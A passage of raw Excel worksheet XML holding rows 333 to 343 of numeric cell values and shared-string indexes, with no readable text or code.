      <c r="AA333">
        <v>0</v>
      </c>
      <c r="AB333">
        <v>0</v>
      </c>
      <c r="AC333">
        <v>300</v>
      </c>
      <c r="AD333">
        <v>1</v>
      </c>
      <c r="AE333">
        <v>0</v>
      </c>
      <c r="AF333" t="s">
        <v>2776</v>
      </c>
      <c r="AG333">
        <v>80222</v>
      </c>
      <c r="AH333">
        <v>17</v>
      </c>
      <c r="AJ333">
        <v>282</v>
      </c>
      <c r="AK333" t="s">
        <v>693</v>
      </c>
      <c r="AL333" t="s">
        <v>602</v>
      </c>
      <c r="AM333" t="s">
        <v>2777</v>
      </c>
      <c r="AN333" t="s">
        <v>55</v>
      </c>
      <c r="AO333">
        <v>2013</v>
      </c>
      <c r="AP333" t="s">
        <v>2778</v>
      </c>
      <c r="AQ333" t="s">
        <v>2779</v>
      </c>
      <c r="AR333" t="s">
        <v>2776</v>
      </c>
      <c r="AS333" t="s">
        <v>71</v>
      </c>
      <c r="AT333" t="s">
        <v>58</v>
      </c>
      <c r="AU333">
        <v>25</v>
      </c>
      <c r="AV333">
        <v>1</v>
      </c>
      <c r="AW333">
        <v>0</v>
      </c>
      <c r="AX333">
        <v>0</v>
      </c>
      <c r="AY333">
        <v>9</v>
      </c>
      <c r="AZ333">
        <v>5</v>
      </c>
      <c r="BA333" t="s">
        <v>17210</v>
      </c>
      <c r="BB333" t="s">
        <v>14982</v>
      </c>
      <c r="BC333">
        <v>0</v>
      </c>
      <c r="BD333" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="334" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A334">
        <v>1028</v>
      </c>
      <c r="B334" t="s">
        <v>2780</v>
      </c>
      <c r="C334" t="s">
        <v>157</v>
      </c>
      <c r="D334" t="s">
        <v>2781</v>
      </c>
      <c r="E334" t="s">
        <v>142</v>
      </c>
      <c r="F334" t="s">
        <v>2782</v>
      </c>
      <c r="G334" s="1">
        <v>44013</v>
      </c>
      <c r="H334">
        <v>1554</v>
      </c>
      <c r="I334">
        <v>1554</v>
      </c>
      <c r="J334">
        <v>3</v>
      </c>
      <c r="K334">
        <v>0</v>
      </c>
      <c r="L334">
        <v>3</v>
      </c>
      <c r="M334">
        <v>0</v>
      </c>
      <c r="N334">
        <v>0</v>
      </c>
      <c r="O334">
        <v>0</v>
      </c>
      <c r="P334">
        <v>0</v>
      </c>
      <c r="Q334">
        <v>5</v>
      </c>
      <c r="R334">
        <v>10</v>
      </c>
      <c r="S334">
        <v>0</v>
      </c>
      <c r="T334">
        <v>1</v>
      </c>
      <c r="U334">
        <v>500000</v>
      </c>
      <c r="V334">
        <v>0</v>
      </c>
      <c r="W334">
        <v>11000</v>
      </c>
      <c r="X334">
        <v>0</v>
      </c>
      <c r="Y334">
        <v>0</v>
      </c>
      <c r="Z334">
        <v>0</v>
      </c>
      <c r="AA334">
        <v>0</v>
      </c>
      <c r="AB334">
        <v>2000</v>
      </c>
      <c r="AC334">
        <v>7500</v>
      </c>
      <c r="AD334">
        <v>0</v>
      </c>
      <c r="AE334">
        <v>20000</v>
      </c>
      <c r="AF334" t="s">
        <v>2783</v>
      </c>
      <c r="AG334">
        <v>67218</v>
      </c>
      <c r="AH334">
        <v>16</v>
      </c>
      <c r="AJ334">
        <v>260</v>
      </c>
      <c r="AK334" t="s">
        <v>425</v>
      </c>
      <c r="AL334" t="s">
        <v>425</v>
      </c>
      <c r="AM334" t="s">
        <v>2784</v>
      </c>
      <c r="AN334" t="s">
        <v>55</v>
      </c>
      <c r="AO334">
        <v>2006</v>
      </c>
      <c r="AP334" t="s">
        <v>2785</v>
      </c>
      <c r="AQ334" t="s">
        <v>2786</v>
      </c>
      <c r="AR334" t="s">
        <v>2787</v>
      </c>
      <c r="AS334" t="s">
        <v>71</v>
      </c>
      <c r="AT334" t="s">
        <v>58</v>
      </c>
      <c r="AU334">
        <v>26</v>
      </c>
      <c r="AV334">
        <v>0</v>
      </c>
      <c r="AW334">
        <v>78</v>
      </c>
      <c r="AX334">
        <v>15</v>
      </c>
      <c r="AY334">
        <v>41</v>
      </c>
      <c r="AZ334">
        <v>15</v>
      </c>
      <c r="BA334" t="s">
        <v>16791</v>
      </c>
      <c r="BB334" t="s">
        <v>15010</v>
      </c>
      <c r="BC334">
        <v>0</v>
      </c>
      <c r="BD334" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="335" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A335">
        <v>1326</v>
      </c>
      <c r="B335" t="s">
        <v>2788</v>
      </c>
      <c r="C335" t="s">
        <v>1672</v>
      </c>
      <c r="D335" t="s">
        <v>2789</v>
      </c>
      <c r="E335" t="s">
        <v>131</v>
      </c>
      <c r="F335" t="s">
        <v>2790</v>
      </c>
      <c r="G335" s="1">
        <v>43896</v>
      </c>
      <c r="H335">
        <v>1604</v>
      </c>
      <c r="I335">
        <v>1604</v>
      </c>
      <c r="J335">
        <v>0</v>
      </c>
      <c r="K335">
        <v>0</v>
      </c>
      <c r="L335">
        <v>0</v>
      </c>
      <c r="M335">
        <v>0</v>
      </c>
      <c r="N335">
        <v>0</v>
      </c>
      <c r="O335">
        <v>0</v>
      </c>
      <c r="P335">
        <v>0</v>
      </c>
      <c r="Q335">
        <v>5</v>
      </c>
      <c r="R335">
        <v>1</v>
      </c>
      <c r="S335">
        <v>0</v>
      </c>
      <c r="T335">
        <v>1</v>
      </c>
      <c r="U335">
        <v>0</v>
      </c>
      <c r="V335">
        <v>0</v>
      </c>
      <c r="W335">
        <v>0</v>
      </c>
      <c r="X335">
        <v>0</v>
      </c>
      <c r="Y335">
        <v>0</v>
      </c>
      <c r="Z335">
        <v>0</v>
      </c>
      <c r="AA335">
        <v>0</v>
      </c>
      <c r="AB335">
        <v>5000</v>
      </c>
      <c r="AC335">
        <v>30000</v>
      </c>
      <c r="AD335">
        <v>0</v>
      </c>
      <c r="AE335">
        <v>200000</v>
      </c>
      <c r="AF335" t="s">
        <v>2791</v>
      </c>
      <c r="AG335">
        <v>72271</v>
      </c>
      <c r="AH335">
        <v>22</v>
      </c>
      <c r="AJ335">
        <v>352</v>
      </c>
      <c r="AK335" t="s">
        <v>2792</v>
      </c>
      <c r="AL335" t="s">
        <v>2793</v>
      </c>
      <c r="AM335" t="s">
        <v>2794</v>
      </c>
      <c r="AN335" t="s">
        <v>55</v>
      </c>
      <c r="AO335">
        <v>2018</v>
      </c>
      <c r="AP335" t="s">
        <v>2795</v>
      </c>
      <c r="AQ335" t="s">
        <v>2791</v>
      </c>
      <c r="AR335" t="s">
        <v>2791</v>
      </c>
      <c r="AS335" t="s">
        <v>71</v>
      </c>
      <c r="AT335" t="s">
        <v>58</v>
      </c>
      <c r="AU335">
        <v>7</v>
      </c>
      <c r="AV335">
        <v>2</v>
      </c>
      <c r="AW335">
        <v>19</v>
      </c>
      <c r="AX335">
        <v>21</v>
      </c>
      <c r="AY335">
        <v>6</v>
      </c>
      <c r="AZ335">
        <v>5</v>
      </c>
      <c r="BA335">
        <v>0</v>
      </c>
      <c r="BB335">
        <v>0</v>
      </c>
      <c r="BC335" t="s">
        <v>10262</v>
      </c>
      <c r="BD335" t="s">
        <v>10263</v>
      </c>
    </row>
    <row r="336" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A336">
        <v>1408</v>
      </c>
      <c r="B336" t="s">
        <v>2796</v>
      </c>
      <c r="C336" t="s">
        <v>129</v>
      </c>
      <c r="D336" t="s">
        <v>2797</v>
      </c>
      <c r="E336" t="s">
        <v>916</v>
      </c>
      <c r="F336" t="s">
        <v>2798</v>
      </c>
      <c r="G336" s="1">
        <v>44124</v>
      </c>
      <c r="H336">
        <v>1675</v>
      </c>
      <c r="I336">
        <v>1675</v>
      </c>
      <c r="J336">
        <v>0</v>
      </c>
      <c r="K336">
        <v>1</v>
      </c>
      <c r="L336">
        <v>0</v>
      </c>
      <c r="M336">
        <v>0</v>
      </c>
      <c r="N336">
        <v>0</v>
      </c>
      <c r="O336">
        <v>0</v>
      </c>
      <c r="P336">
        <v>0</v>
      </c>
      <c r="Q336">
        <v>0</v>
      </c>
      <c r="R336">
        <v>0</v>
      </c>
      <c r="S336">
        <v>0</v>
      </c>
      <c r="T336">
        <v>1</v>
      </c>
      <c r="U336">
        <v>0</v>
      </c>
      <c r="V336">
        <v>150000</v>
      </c>
      <c r="W336">
        <v>0</v>
      </c>
      <c r="X336">
        <v>0</v>
      </c>
      <c r="Y336">
        <v>0</v>
      </c>
      <c r="Z336">
        <v>0</v>
      </c>
      <c r="AA336">
        <v>0</v>
      </c>
      <c r="AB336">
        <v>0</v>
      </c>
      <c r="AC336">
        <v>0</v>
      </c>
      <c r="AD336">
        <v>0</v>
      </c>
      <c r="AE336">
        <v>1350000</v>
      </c>
      <c r="AF336" t="s">
        <v>2799</v>
      </c>
      <c r="AG336">
        <v>15710</v>
      </c>
      <c r="AH336">
        <v>11</v>
      </c>
      <c r="AJ336">
        <v>268</v>
      </c>
      <c r="AK336" t="s">
        <v>829</v>
      </c>
      <c r="AL336" t="s">
        <v>2800</v>
      </c>
      <c r="AM336" t="s">
        <v>2801</v>
      </c>
      <c r="AN336" t="s">
        <v>55</v>
      </c>
      <c r="AO336">
        <v>1976</v>
      </c>
      <c r="AP336" t="s">
        <v>2802</v>
      </c>
      <c r="AQ336" t="s">
        <v>2803</v>
      </c>
      <c r="AR336" t="s">
        <v>2799</v>
      </c>
      <c r="AS336" t="s">
        <v>371</v>
      </c>
      <c r="AT336" t="s">
        <v>58</v>
      </c>
      <c r="AU336">
        <v>20</v>
      </c>
      <c r="AV336">
        <v>1</v>
      </c>
      <c r="AW336">
        <v>20</v>
      </c>
      <c r="AX336">
        <v>0</v>
      </c>
      <c r="AY336">
        <v>20</v>
      </c>
      <c r="AZ336">
        <v>40</v>
      </c>
      <c r="BA336" t="s">
        <v>16879</v>
      </c>
      <c r="BB336" t="s">
        <v>15257</v>
      </c>
      <c r="BC336" t="s">
        <v>11301</v>
      </c>
      <c r="BD336">
        <v>0</v>
      </c>
    </row>
    <row r="337" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A337">
        <v>984</v>
      </c>
      <c r="B337" t="s">
        <v>2804</v>
      </c>
      <c r="C337" t="s">
        <v>88</v>
      </c>
      <c r="D337" t="s">
        <v>2805</v>
      </c>
      <c r="E337" t="s">
        <v>49</v>
      </c>
      <c r="F337" t="s">
        <v>2806</v>
      </c>
      <c r="G337" s="1">
        <v>44337</v>
      </c>
      <c r="H337">
        <v>1697</v>
      </c>
      <c r="I337">
        <v>1697</v>
      </c>
      <c r="J337">
        <v>0</v>
      </c>
      <c r="K337">
        <v>0</v>
      </c>
      <c r="L337">
        <v>0</v>
      </c>
      <c r="M337">
        <v>0</v>
      </c>
      <c r="N337">
        <v>0</v>
      </c>
      <c r="O337">
        <v>0</v>
      </c>
      <c r="P337">
        <v>0</v>
      </c>
      <c r="Q337">
        <v>0</v>
      </c>
      <c r="R337">
        <v>39</v>
      </c>
      <c r="S337">
        <v>0</v>
      </c>
      <c r="T337">
        <v>0</v>
      </c>
      <c r="U337">
        <v>0</v>
      </c>
      <c r="V337">
        <v>0</v>
      </c>
      <c r="W337">
        <v>0</v>
      </c>
      <c r="X337">
        <v>0</v>
      </c>
      <c r="Y337">
        <v>0</v>
      </c>
      <c r="Z337">
        <v>0</v>
      </c>
      <c r="AA337">
        <v>0</v>
      </c>
      <c r="AB337">
        <v>0</v>
      </c>
      <c r="AC337">
        <v>2000</v>
      </c>
      <c r="AD337">
        <v>0</v>
      </c>
      <c r="AE337">
        <v>0</v>
      </c>
      <c r="AF337" t="s">
        <v>2807</v>
      </c>
      <c r="AG337">
        <v>80225</v>
      </c>
      <c r="AH337">
        <v>17</v>
      </c>
      <c r="AJ337">
        <v>282</v>
      </c>
      <c r="AK337" t="s">
        <v>592</v>
      </c>
      <c r="AL337" t="s">
        <v>2808</v>
      </c>
      <c r="AM337" t="s">
        <v>2809</v>
      </c>
      <c r="AN337" t="s">
        <v>55</v>
      </c>
      <c r="AO337">
        <v>2005</v>
      </c>
      <c r="AP337" t="s">
        <v>2810</v>
      </c>
      <c r="AQ337" t="s">
        <v>2811</v>
      </c>
      <c r="AR337" t="s">
        <v>2807</v>
      </c>
      <c r="AS337" t="s">
        <v>57</v>
      </c>
      <c r="AT337" t="s">
        <v>58</v>
      </c>
      <c r="AU337">
        <v>24</v>
      </c>
      <c r="AV337">
        <v>0</v>
      </c>
      <c r="AW337">
        <v>0</v>
      </c>
      <c r="AX337">
        <v>0</v>
      </c>
      <c r="AY337">
        <v>11</v>
      </c>
      <c r="AZ337">
        <v>3</v>
      </c>
      <c r="BA337" t="s">
        <v>16788</v>
      </c>
      <c r="BB337" t="s">
        <v>14981</v>
      </c>
      <c r="BC337">
        <v>0</v>
      </c>
      <c r="BD337" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="338" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A338">
        <v>1639</v>
      </c>
      <c r="B338" t="s">
        <v>2812</v>
      </c>
      <c r="C338" t="s">
        <v>88</v>
      </c>
      <c r="D338" t="s">
        <v>2813</v>
      </c>
      <c r="E338" t="s">
        <v>142</v>
      </c>
      <c r="F338" t="s">
        <v>2814</v>
      </c>
      <c r="G338" s="1">
        <v>44369</v>
      </c>
      <c r="H338">
        <v>1821</v>
      </c>
      <c r="I338">
        <v>1821</v>
      </c>
      <c r="J338">
        <v>1</v>
      </c>
      <c r="K338">
        <v>0</v>
      </c>
      <c r="L338">
        <v>0</v>
      </c>
      <c r="M338">
        <v>1</v>
      </c>
      <c r="N338">
        <v>0</v>
      </c>
      <c r="O338">
        <v>1</v>
      </c>
      <c r="P338">
        <v>1</v>
      </c>
      <c r="Q338">
        <v>2</v>
      </c>
      <c r="R338">
        <v>1</v>
      </c>
      <c r="S338">
        <v>1</v>
      </c>
      <c r="T338">
        <v>2</v>
      </c>
      <c r="U338">
        <v>30000</v>
      </c>
      <c r="V338">
        <v>0</v>
      </c>
      <c r="W338">
        <v>0</v>
      </c>
      <c r="X338">
        <v>500</v>
      </c>
      <c r="Y338">
        <v>0</v>
      </c>
      <c r="Z338">
        <v>1</v>
      </c>
      <c r="AA338">
        <v>10000</v>
      </c>
      <c r="AB338">
        <v>5000</v>
      </c>
      <c r="AC338">
        <v>10000</v>
      </c>
      <c r="AD338">
        <v>1</v>
      </c>
      <c r="AE338">
        <v>10000</v>
      </c>
      <c r="AF338" t="s">
        <v>2815</v>
      </c>
      <c r="AG338">
        <v>80222</v>
      </c>
      <c r="AH338">
        <v>17</v>
      </c>
      <c r="AJ338">
        <v>282</v>
      </c>
      <c r="AK338" t="s">
        <v>592</v>
      </c>
      <c r="AL338" t="s">
        <v>593</v>
      </c>
      <c r="AM338" t="s">
        <v>2816</v>
      </c>
      <c r="AN338" t="s">
        <v>55</v>
      </c>
      <c r="AO338">
        <v>2011</v>
      </c>
      <c r="AP338" t="s">
        <v>2817</v>
      </c>
      <c r="AQ338" t="s">
        <v>2818</v>
      </c>
      <c r="AR338" t="s">
        <v>2819</v>
      </c>
      <c r="AS338" t="s">
        <v>71</v>
      </c>
      <c r="AT338" t="s">
        <v>58</v>
      </c>
      <c r="AU338">
        <v>0</v>
      </c>
      <c r="AV338">
        <v>0</v>
      </c>
      <c r="AW338">
        <v>0</v>
      </c>
      <c r="AX338">
        <v>2</v>
      </c>
      <c r="AY338">
        <v>34</v>
      </c>
      <c r="AZ338">
        <v>44</v>
      </c>
      <c r="BA338" t="s">
        <v>16959</v>
      </c>
      <c r="BB338" t="s">
        <v>15419</v>
      </c>
      <c r="BC338">
        <v>0</v>
      </c>
      <c r="BD338" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="339" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A339">
        <v>1490</v>
      </c>
      <c r="B339" t="s">
        <v>2820</v>
      </c>
      <c r="C339" t="s">
        <v>2308</v>
      </c>
      <c r="D339" t="s">
        <v>2821</v>
      </c>
      <c r="E339" t="s">
        <v>142</v>
      </c>
      <c r="F339" t="s">
        <v>2822</v>
      </c>
      <c r="G339" s="1">
        <v>43990</v>
      </c>
      <c r="H339">
        <v>1903</v>
      </c>
      <c r="I339">
        <v>1903</v>
      </c>
      <c r="J339">
        <v>2</v>
      </c>
      <c r="K339">
        <v>0</v>
      </c>
      <c r="L339">
        <v>3</v>
      </c>
      <c r="M339">
        <v>0</v>
      </c>
      <c r="N339">
        <v>0</v>
      </c>
      <c r="O339">
        <v>0</v>
      </c>
      <c r="P339">
        <v>0</v>
      </c>
      <c r="Q339">
        <v>1</v>
      </c>
      <c r="R339">
        <v>5</v>
      </c>
      <c r="S339">
        <v>0</v>
      </c>
      <c r="T339">
        <v>0</v>
      </c>
      <c r="U339">
        <v>175000</v>
      </c>
      <c r="V339">
        <v>0</v>
      </c>
      <c r="W339">
        <v>9500</v>
      </c>
      <c r="X339">
        <v>0</v>
      </c>
      <c r="Y339">
        <v>0</v>
      </c>
      <c r="Z339">
        <v>0</v>
      </c>
      <c r="AA339">
        <v>0</v>
      </c>
      <c r="AB339">
        <v>200</v>
      </c>
      <c r="AC339">
        <v>3150</v>
      </c>
      <c r="AD339">
        <v>0</v>
      </c>
      <c r="AE339">
        <v>0</v>
      </c>
      <c r="AF339" t="s">
        <v>2823</v>
      </c>
      <c r="AG339">
        <v>98414</v>
      </c>
      <c r="AH339">
        <v>33</v>
      </c>
      <c r="AJ339">
        <v>485</v>
      </c>
      <c r="AK339" t="s">
        <v>2313</v>
      </c>
      <c r="AL339" t="s">
        <v>2314</v>
      </c>
      <c r="AM339" t="s">
        <v>2824</v>
      </c>
      <c r="AN339" t="s">
        <v>55</v>
      </c>
      <c r="AO339">
        <v>1970</v>
      </c>
      <c r="AP339" t="s">
        <v>2825</v>
      </c>
      <c r="AQ339" t="s">
        <v>2826</v>
      </c>
      <c r="AR339" t="s">
        <v>2827</v>
      </c>
      <c r="AS339" t="s">
        <v>71</v>
      </c>
      <c r="AT339" t="s">
        <v>58</v>
      </c>
      <c r="AU339">
        <v>0</v>
      </c>
      <c r="AV339">
        <v>0</v>
      </c>
      <c r="AW339">
        <v>0</v>
      </c>
      <c r="AX339">
        <v>0</v>
      </c>
      <c r="AY339">
        <v>4</v>
      </c>
      <c r="AZ339">
        <v>2</v>
      </c>
      <c r="BA339" t="s">
        <v>16912</v>
      </c>
      <c r="BB339" t="s">
        <v>15317</v>
      </c>
      <c r="BC339" t="s">
        <v>10369</v>
      </c>
      <c r="BD339" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="340" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A340">
        <v>1270</v>
      </c>
      <c r="B340" t="s">
        <v>2828</v>
      </c>
      <c r="C340" t="s">
        <v>168</v>
      </c>
      <c r="D340" t="s">
        <v>2829</v>
      </c>
      <c r="E340" t="s">
        <v>111</v>
      </c>
      <c r="F340" t="s">
        <v>2830</v>
      </c>
      <c r="G340" s="1">
        <v>44347</v>
      </c>
      <c r="H340">
        <v>1904</v>
      </c>
      <c r="I340">
        <v>1904</v>
      </c>
      <c r="J340">
        <v>4</v>
      </c>
      <c r="K340">
        <v>0</v>
      </c>
      <c r="L340">
        <v>0</v>
      </c>
      <c r="M340">
        <v>0</v>
      </c>
      <c r="N340">
        <v>0</v>
      </c>
      <c r="O340">
        <v>0</v>
      </c>
      <c r="P340">
        <v>0</v>
      </c>
      <c r="Q340">
        <v>0</v>
      </c>
      <c r="R340">
        <v>0</v>
      </c>
      <c r="S340">
        <v>0</v>
      </c>
      <c r="T340">
        <v>0</v>
      </c>
      <c r="U340">
        <v>3000000</v>
      </c>
      <c r="V340">
        <v>0</v>
      </c>
      <c r="W340">
        <v>0</v>
      </c>
      <c r="X340">
        <v>0</v>
      </c>
      <c r="Y340">
        <v>0</v>
      </c>
      <c r="Z340">
        <v>0</v>
      </c>
      <c r="AA340">
        <v>0</v>
      </c>
      <c r="AB340">
        <v>0</v>
      </c>
      <c r="AC340">
        <v>0</v>
      </c>
      <c r="AD340">
        <v>0</v>
      </c>
      <c r="AE340">
        <v>0</v>
      </c>
      <c r="AF340" t="s">
        <v>2831</v>
      </c>
      <c r="AG340">
        <v>17414</v>
      </c>
      <c r="AH340">
        <v>13</v>
      </c>
      <c r="AJ340">
        <v>183</v>
      </c>
      <c r="AK340" t="s">
        <v>2832</v>
      </c>
      <c r="AL340" t="s">
        <v>2833</v>
      </c>
      <c r="AM340" t="s">
        <v>2834</v>
      </c>
      <c r="AN340" t="s">
        <v>82</v>
      </c>
      <c r="AO340">
        <v>2007</v>
      </c>
      <c r="AP340" t="s">
        <v>2835</v>
      </c>
      <c r="AQ340" t="s">
        <v>2836</v>
      </c>
      <c r="AR340" t="s">
        <v>2837</v>
      </c>
      <c r="AS340" t="s">
        <v>179</v>
      </c>
      <c r="AT340" t="s">
        <v>86</v>
      </c>
      <c r="AU340">
        <v>31</v>
      </c>
      <c r="AV340">
        <v>1</v>
      </c>
      <c r="AW340">
        <v>0</v>
      </c>
      <c r="AX340">
        <v>0</v>
      </c>
      <c r="AY340">
        <v>10</v>
      </c>
      <c r="AZ340">
        <v>10</v>
      </c>
      <c r="BA340" t="s">
        <v>16834</v>
      </c>
      <c r="BB340" t="s">
        <v>15163</v>
      </c>
      <c r="BC340" t="s">
        <v>10267</v>
      </c>
      <c r="BD340">
        <v>0</v>
      </c>
    </row>
    <row r="341" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A341">
        <v>1262</v>
      </c>
      <c r="B341" t="s">
        <v>2838</v>
      </c>
      <c r="C341" t="s">
        <v>88</v>
      </c>
      <c r="D341" t="s">
        <v>2839</v>
      </c>
      <c r="E341" t="s">
        <v>363</v>
      </c>
      <c r="F341" t="s">
        <v>2840</v>
      </c>
      <c r="G341" s="1">
        <v>43934</v>
      </c>
      <c r="H341">
        <v>2034</v>
      </c>
      <c r="I341">
        <v>2034</v>
      </c>
      <c r="J341">
        <v>0</v>
      </c>
      <c r="K341">
        <v>0</v>
      </c>
      <c r="L341">
        <v>0</v>
      </c>
      <c r="M341">
        <v>0</v>
      </c>
      <c r="N341">
        <v>0</v>
      </c>
      <c r="O341">
        <v>0</v>
      </c>
      <c r="P341">
        <v>0</v>
      </c>
      <c r="Q341">
        <v>0</v>
      </c>
      <c r="R341">
        <v>0</v>
      </c>
      <c r="S341">
        <v>0</v>
      </c>
      <c r="T341">
        <v>1</v>
      </c>
      <c r="U341">
        <v>0</v>
      </c>
      <c r="V341">
        <v>0</v>
      </c>
      <c r="W341">
        <v>0</v>
      </c>
      <c r="X341">
        <v>0</v>
      </c>
      <c r="Y341">
        <v>0</v>
      </c>
      <c r="Z341">
        <v>0</v>
      </c>
      <c r="AA341">
        <v>0</v>
      </c>
      <c r="AB341">
        <v>0</v>
      </c>
      <c r="AC341">
        <v>0</v>
      </c>
      <c r="AD341">
        <v>0</v>
      </c>
      <c r="AE341">
        <v>1000</v>
      </c>
      <c r="AF341" t="s">
        <v>2841</v>
      </c>
      <c r="AG341">
        <v>80114</v>
      </c>
      <c r="AH341">
        <v>17</v>
      </c>
      <c r="AJ341">
        <v>282</v>
      </c>
      <c r="AK341" t="s">
        <v>2842</v>
      </c>
      <c r="AL341" t="s">
        <v>2843</v>
      </c>
      <c r="AM341" t="s">
        <v>2844</v>
      </c>
      <c r="AN341" t="s">
        <v>55</v>
      </c>
      <c r="AO341">
        <v>2018</v>
      </c>
      <c r="AP341" t="s">
        <v>2845</v>
      </c>
      <c r="AQ341" t="s">
        <v>2846</v>
      </c>
      <c r="AR341" t="s">
        <v>2841</v>
      </c>
      <c r="AS341" t="s">
        <v>71</v>
      </c>
      <c r="AT341" t="s">
        <v>58</v>
      </c>
      <c r="AU341">
        <v>6</v>
      </c>
      <c r="AV341">
        <v>0</v>
      </c>
      <c r="AW341">
        <v>0</v>
      </c>
      <c r="AX341">
        <v>0</v>
      </c>
      <c r="AY341">
        <v>3</v>
      </c>
      <c r="AZ341">
        <v>3</v>
      </c>
      <c r="BA341" t="s">
        <v>17233</v>
      </c>
      <c r="BB341" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC341" t="s">
        <v>9746</v>
      </c>
      <c r="BD341" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="342" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A342">
        <v>990</v>
      </c>
      <c r="B342" t="s">
        <v>2847</v>
      </c>
      <c r="C342" t="s">
        <v>2848</v>
      </c>
      <c r="D342" t="s">
        <v>2849</v>
      </c>
      <c r="E342" t="s">
        <v>142</v>
      </c>
      <c r="F342" t="s">
        <v>2850</v>
      </c>
      <c r="G342" s="1">
        <v>43889</v>
      </c>
      <c r="H342">
        <v>2044</v>
      </c>
      <c r="I342">
        <v>2044</v>
      </c>
      <c r="J342">
        <v>3</v>
      </c>
      <c r="K342">
        <v>0</v>
      </c>
      <c r="L342">
        <v>1</v>
      </c>
      <c r="M342">
        <v>9</v>
      </c>
      <c r="N342">
        <v>0</v>
      </c>
      <c r="O342">
        <v>0</v>
      </c>
      <c r="P342">
        <v>0</v>
      </c>
      <c r="Q342">
        <v>0</v>
      </c>
      <c r="R342">
        <v>0</v>
      </c>
      <c r="S342">
        <v>0</v>
      </c>
      <c r="T342">
        <v>0</v>
      </c>
      <c r="U342">
        <v>500000</v>
      </c>
      <c r="V342">
        <v>0</v>
      </c>
      <c r="W342">
        <v>500</v>
      </c>
      <c r="X342">
        <v>2700</v>
      </c>
      <c r="Y342">
        <v>0</v>
      </c>
      <c r="Z342">
        <v>0</v>
      </c>
      <c r="AA342">
        <v>0</v>
      </c>
      <c r="AB342">
        <v>0</v>
      </c>
      <c r="AC342">
        <v>0</v>
      </c>
      <c r="AD342">
        <v>0</v>
      </c>
      <c r="AE342">
        <v>0</v>
      </c>
      <c r="AF342" t="s">
        <v>2851</v>
      </c>
      <c r="AG342">
        <v>30962</v>
      </c>
      <c r="AH342">
        <v>9</v>
      </c>
      <c r="AJ342">
        <v>105</v>
      </c>
      <c r="AK342" t="s">
        <v>2852</v>
      </c>
      <c r="AL342" t="s">
        <v>2853</v>
      </c>
      <c r="AM342" t="s">
        <v>2854</v>
      </c>
      <c r="AN342" t="s">
        <v>82</v>
      </c>
      <c r="AO342">
        <v>1989</v>
      </c>
      <c r="AP342" t="s">
        <v>2855</v>
      </c>
      <c r="AQ342" t="s">
        <v>2856</v>
      </c>
      <c r="AR342" t="s">
        <v>2857</v>
      </c>
      <c r="AS342" t="s">
        <v>71</v>
      </c>
      <c r="AT342" t="s">
        <v>86</v>
      </c>
      <c r="AU342">
        <v>25</v>
      </c>
      <c r="AV342">
        <v>1</v>
      </c>
      <c r="AW342">
        <v>14</v>
      </c>
      <c r="AX342">
        <v>8</v>
      </c>
      <c r="AY342">
        <v>45</v>
      </c>
      <c r="AZ342">
        <v>53</v>
      </c>
      <c r="BA342" t="s">
        <v>17258</v>
      </c>
      <c r="BB342" t="s">
        <v>14985</v>
      </c>
      <c r="BC342" t="s">
        <v>9550</v>
      </c>
      <c r="BD342" t="s">
        <v>10402</v>
      </c>
    </row>
    <row r="343" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A343">
        <v>1611</v>
      </c>
      <c r="B343" t="s">
        <v>2858</v>
      </c>
      <c r="C343" t="s">
        <v>157</v>
      </c>
      <c r="D343" t="s">
        <v>2859</v>
      </c>
      <c r="E343" t="s">
        <v>412</v>
      </c>
      <c r="F343" t="s">
        <v>2860</v>
      </c>
      <c r="G343" s="1">
        <v>44183</v>
      </c>
      <c r="H343">
        <v>2081</v>
      </c>
      <c r="I343">
        <v>2081</v>
      </c>
      <c r="J343">
        <v>4</v>
      </c>
      <c r="K343">
        <v>5</v>
      </c>
      <c r="L343">
        <v>2</v>
      </c>
      <c r="M343">
        <v>0</v>
      </c>
      <c r="N343">
        <v>600</v>
      </c>
      <c r="O343">
        <v>0</v>
      </c>
      <c r="P343">
        <v>0</v>
      </c>
      <c r="Q343">
        <v>10</v>
      </c>
      <c r="R343">
        <v>40</v>
      </c>
      <c r="S343">
        <v>0</v>
      </c>
      <c r="T343">
        <v>2</v>
      </c>
      <c r="U343">
        <v>5000000</v>
      </c>
      <c r="V343">
        <v>10000</v>
      </c>
      <c r="W343">
        <v>8000</v>
      </c>
      <c r="X343">
        <v>0</v>
      </c>
      <c r="Y343">
        <v>0</v>
      </c>
      <c r="Z343">
        <v>0</v>
      </c>
      <c r="AA343">
        <v>0</v>
      </c>
      <c r="AB343">
        <v>600</v>
      </c>
      <c r="AC343">
        <v>600</v>
      </c>
      <c r="AD343">
        <v>0</v>
      </c>
      <c r="AE343">
        <v>200000</v>
      </c>
      <c r="AF343" t="s">
        <v>2861</v>
      </c>
      <c r="AG343">
        <v>62382</v>
      </c>
      <c r="AH343">
        <v>16</v>
      </c>
      <c r="AJ343">
        <v>250</v>
      </c>
      <c r="AK343" t="s">
        <v>2862</v>
      </c>
      <c r="AL343" t="s">
        <v>2863</v>
      </c>
      <c r="AM343" t="s">
        <v>2864</v>
      </c>
      <c r="AN343" t="s">
        <v>55</v>
      </c>
      <c r="AO343">
        <v>2018</v>
      </c>
      <c r="AP343" t="s">
        <v>2865</v>
      </c>
      <c r="AQ343" t="s">
        <v>2866</v>
      </c>
      <c r="AR343" t="s">
        <v>2861</v>
      </c>
      <c r="AS343" t="s">
        <v>71</v>
      </c>
      <c r="AT343" t="s">
        <v>58</v>
      </c>
      <c r="AU343">
        <v>25</v>
      </c>
      <c r="AV343">
        <v>1</v>
      </c>
      <c r="AW343">
        <v>20</v>
      </c>
      <c r="AX343">
        <v>140</v>
      </c>
      <c r="AY343">
        <v>9</v>
      </c>
      <c r="AZ343">
        <v>2</v>
      </c>
